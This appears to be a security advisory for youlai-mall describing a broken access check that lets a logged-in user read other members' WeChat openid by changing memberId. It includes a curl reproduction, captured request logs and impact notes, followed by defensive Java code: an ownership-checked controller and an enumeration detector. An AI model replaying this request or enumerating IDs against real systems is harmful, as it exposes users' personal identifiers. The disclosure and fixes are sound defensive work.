
The youlai-mall application has an improper access control vulnerability that allows unauthorized users to retrieve other users’ WeChat openid by manipulating the memberId parameter. #21

@Hwwg


Contributors: Huang Weigang

1. Vulnerability Impact

youlai-mall (latest)
https://github.com/youlaitech/youlai-mall

2. Vulnerability Location

  • memberId: GET /mall-ums/app-api/v1/members/{memberId}/openid

3. Code Analysis

First, the API accepts memberId as the parameter.


In the implementation behind it, the service queries the member record directly by that id and returns its openid; nothing checks that the record belongs to the currently logged-in user, so the path parameter alone decides whose data is returned.

Vulnerability Reproduction

  • Preconditions: Attacker has a valid App login token; the target user’s memberId is known or guessable.
  • Target endpoint: GET /mall-ums/app-api/v1/members/{memberId}/openid
  • Steps:
    • Log in as User A and obtain a valid Authorization: Bearer .
    • Send a request using User B’s memberId:
      curl -H "Authorization: Bearer " https:///mall-ums/app-api/v1/members/12345/openid
    • Observe a 200 OK response containing User B’s openid, for example:
      {"code":200,"data":"oUBUG5hAB_8EMrSaqd2HjJQBFg74","msg":"success"}
  • Code reference: The controller method directly queries by memberId and returns openid without verifying ownership (no memberId == SecurityUtils.getMemberId() check).
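The report's code reference above names the missing check; the following is an added example of what the endpoint looks like with that check in place. It is not youlai-mall's own code: SecurityUtils.getMemberId() is the helper the report names, while MemberService, Result, the package name and the Spring Web controller shape are assumptions made for the example.

```java
// Added example (not youlai-mall's own code): the openid endpoint with a
// resource-ownership check. SecurityUtils.getMemberId() is the helper named in
// the report; MemberService, Result and the package are hypothetical stand-ins
// assumed to be available in this package.
package com.example.ums.controller;

import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.http.HttpStatus;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;
import org.springframework.web.server.ResponseStatusException;

@RestController
@RequestMapping("/app-api/v1/members")
public class MemberOpenidController {

    private static final Logger log = LoggerFactory.getLogger(MemberOpenidController.class);

    // Hypothetical service: looks up a member's openid by member id.
    private final MemberService memberService;

    public MemberOpenidController(MemberService memberService) {
        this.memberService = memberService;
    }

    /*
     * Shape described in the report: the path parameter alone decides whose
     * openid is returned, so any valid token can read any member's openid.
     *
     *   @GetMapping("/{memberId}/openid")
     *   public Result<String> getOpenid(@PathVariable Long memberId) {
     *       return Result.success(memberService.getOpenidById(memberId));
     *   }
     */

    // Hardened: identity comes from the authenticated session, and the path
    // parameter is only honoured when it matches that identity.
    @GetMapping("/{memberId}/openid")
    public Result<String> getOpenid(@PathVariable Long memberId) {
        Long currentMemberId = SecurityUtils.getMemberId();
        if (currentMemberId == null) {
            throw new ResponseStatusException(HttpStatus.UNAUTHORIZED, "not authenticated");
        }
        if (!currentMemberId.equals(memberId)) {
            // Refuse and record the attempt: repeated mismatches from one caller
            // are the signal a detection rule should key on.
            log.warn("openid access denied: caller={} requested memberId={}", currentMemberId, memberId);
            throw new ResponseStatusException(HttpStatus.FORBIDDEN, "not the resource owner");
        }
        // Query by the session's id, never by the caller-supplied one.
        return Result.success(memberService.getOpenidById(currentMemberId));
    }

    // Preferable shape: no caller-supplied id at all, so there is nothing to tamper with.
    @GetMapping("/me/openid")
    public Result<String> getMyOpenid() {
        Long currentMemberId = SecurityUtils.getMemberId();
        if (currentMemberId == null) {
            throw new ResponseStatusException(HttpStatus.UNAUTHORIZED, "not authenticated");
        }
        return Result.success(memberService.getOpenidById(currentMemberId));
    }
}
```

The second mapping is the better long-term shape: once the identifier is derived from the token rather than the URL, the ownership comparison has nothing left to compare, and a client that still sends someone else's memberId simply hits the guarded legacy route and gets a 403 that is also logged.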

"data": {
    "request_data": {
        "method": "GET",
        "url": "http://10.15.196.160:9999/mall-ums/app-api/v1/members/1/openid",
        "json": {},
        "params": {},
        "data": {},
        "files": {}
    },
    "response_data": {
        "code": "00000",
        "data": "oUBUG5hAB_8EMrSaqd2HjJQBFg74",
        "msg": "一切ok"
    }
},

USER-B

"test": {
    "request_data": {
        "method": "GET",
        "url": "http://10.15.196.160:9999/mall-ums/app-api/v1/members/1/openid",
        "json": {},
        "params": {},
        "data": {},
        "files": {}
    },
    "response_data": {
        "code": "00000",
        "data": "oUBUG5hAB_8EMrSaqd2HjJQBFg74",
        "msg": "一切ok"
    }
}
}

4. Impact Description

  • Sensitive identifier leakage: Exposes a user’s openid, the unique WeChat identifier for the mini-app, to unauthorized parties.
  • Enumeration and profiling: Combined with GET /app-api/v1/members/openid/{openid} (returns MemberAuthDTO with id/username/status), enables account enumeration and user profiling.
  • Expanded attack surface: If memberId values are predictable or enumerable, attackers can build a system-wide memberId → openid mapping, facilitating social engineering and targeted abuse.
  • Access control failure: Missing resource ownership validation violates least privilege and data boundary principles.
  • Compliance risk: Unauthorized disclosure of personal identifiers can trigger privacy and regulatory noncompliance concerns.
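The enumeration risk above leaves a visible trace: one authenticated caller requesting the openid of many different memberId values. The following added example (not part of the report) scans access-log lines for that pattern. The log format, the "caller=" field (the authenticated memberId, never the raw bearer token) and all sample lines are constructed for the example.

```java
// Added example (not part of the report): flags callers that request many
// different memberId values on the openid endpoint. The log format, the
// "caller=" field and the sample lines are constructed for this example.
import java.util.ArrayList;
import java.util.Collections;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.Set;
import java.util.TreeSet;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class OpenidEnumerationDetector {

    // Constructed line format: "<timestamp> caller=<memberId> GET <path> <status>"
    private static final Pattern LINE = Pattern.compile(
        "^(?<ts>\\S+) caller=(?<caller>\\d+) GET /mall-ums/app-api/v1/members/(?<id>\\d+)/openid (?<status>\\d{3})$");

    /** Maps each caller to the distinct memberIds it requested that are not its own. */
    public static Map<String, Set<String>> foreignIdsPerCaller(List<String> lines) {
        Map<String, Set<String>> out = new HashMap<>();
        for (String line : lines) {
            Matcher m = LINE.matcher(line);
            if (!m.matches()) {
                continue; // unrelated request or unparsable line
            }
            String caller = m.group("caller");
            String requested = m.group("id");
            if (!caller.equals(requested)) {
                out.computeIfAbsent(caller, k -> new TreeSet<>()).add(requested);
            }
        }
        return out;
    }

    /** Callers whose number of distinct foreign memberIds reaches the threshold, sorted. */
    public static List<String> flagCallers(List<String> lines, int threshold) {
        List<String> flagged = new ArrayList<>();
        for (Map.Entry<String, Set<String>> e : foreignIdsPerCaller(lines).entrySet()) {
            if (e.getValue().size() >= threshold) {
                flagged.add(e.getKey());
            }
        }
        Collections.sort(flagged);
        return flagged;
    }

    public static void main(String[] args) {
        // Constructed sample: caller 7 reads its own openid once and then walks
        // ids 1..4; caller 42 only reads its own record. The status code is
        // deliberately ignored: on a patched server the foreign requests become
        // 403s, but the enumeration pattern is the same.
        List<String> sample = List.of(
            "2024-01-01T10:00:00Z caller=7 GET /mall-ums/app-api/v1/members/7/openid 200",
            "2024-01-01T10:00:01Z caller=7 GET /mall-ums/app-api/v1/members/1/openid 200",
            "2024-01-01T10:00:02Z caller=7 GET /mall-ums/app-api/v1/members/2/openid 200",
            "2024-01-01T10:00:03Z caller=7 GET /mall-ums/app-api/v1/members/3/openid 403",
            "2024-01-01T10:00:04Z caller=7 GET /mall-ums/app-api/v1/members/4/openid 403",
            "2024-01-01T10:00:05Z caller=42 GET /mall-ums/app-api/v1/members/42/openid 200",
            "2024-01-01T10:00:06Z caller=42 POST /mall-ums/app-api/v1/orders 201"
        );
        System.out.println("foreign ids per caller: " + foreignIdsPerCaller(sample));
        System.out.println("flagged (threshold 3): " + flagCallers(sample, 3));
    }
}
```

Keying on the authenticated member rather than the token means the rule keeps working across token refreshes, and counting distinct foreign ids (rather than raw request volume) separates an enumeration sweep from a client that merely retries its own request.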
